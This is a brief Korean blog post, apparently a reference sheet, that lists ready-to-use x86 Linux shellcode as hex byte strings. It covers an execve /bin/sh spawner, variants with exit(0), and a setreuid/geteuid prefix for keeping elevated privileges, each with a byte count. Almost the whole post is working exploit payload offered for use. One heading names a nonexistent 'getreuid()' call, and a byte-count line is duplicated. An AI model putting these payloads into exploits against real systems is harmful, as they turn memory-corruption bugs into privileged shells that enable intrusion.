시스템/시스템 해킹
기본 쉘코드
shnec
2016. 7. 14. 11:08
http://intenila.tistory.com/5
x01. 가장 기본적으로 쉘을 띄우는 코드
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
bytes : 25
미포함 : setreuid(), exit()
0x02. 쉘을 종료할 때 exit(0)으로 정상종료까지 시켜주는 코드
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
\x31\xc0\xb0\x01\xcd\x80
bytes : 31
미포함 : setreuid()
0x03. setreuid(geteuid(), getreuid()), exit(0) 까지 포함시킨 쉘 코드
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
\x31\xc0\xb0\x01\xcd\x80
bytes : 47
0x04. exit(0) 코드
\x31\xc0\xb0\x01\xcd\x80
bytes : 6
0x05. setreuid(geteuid(), geteuid()) 코드
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80
bytes : 16
bytes : 16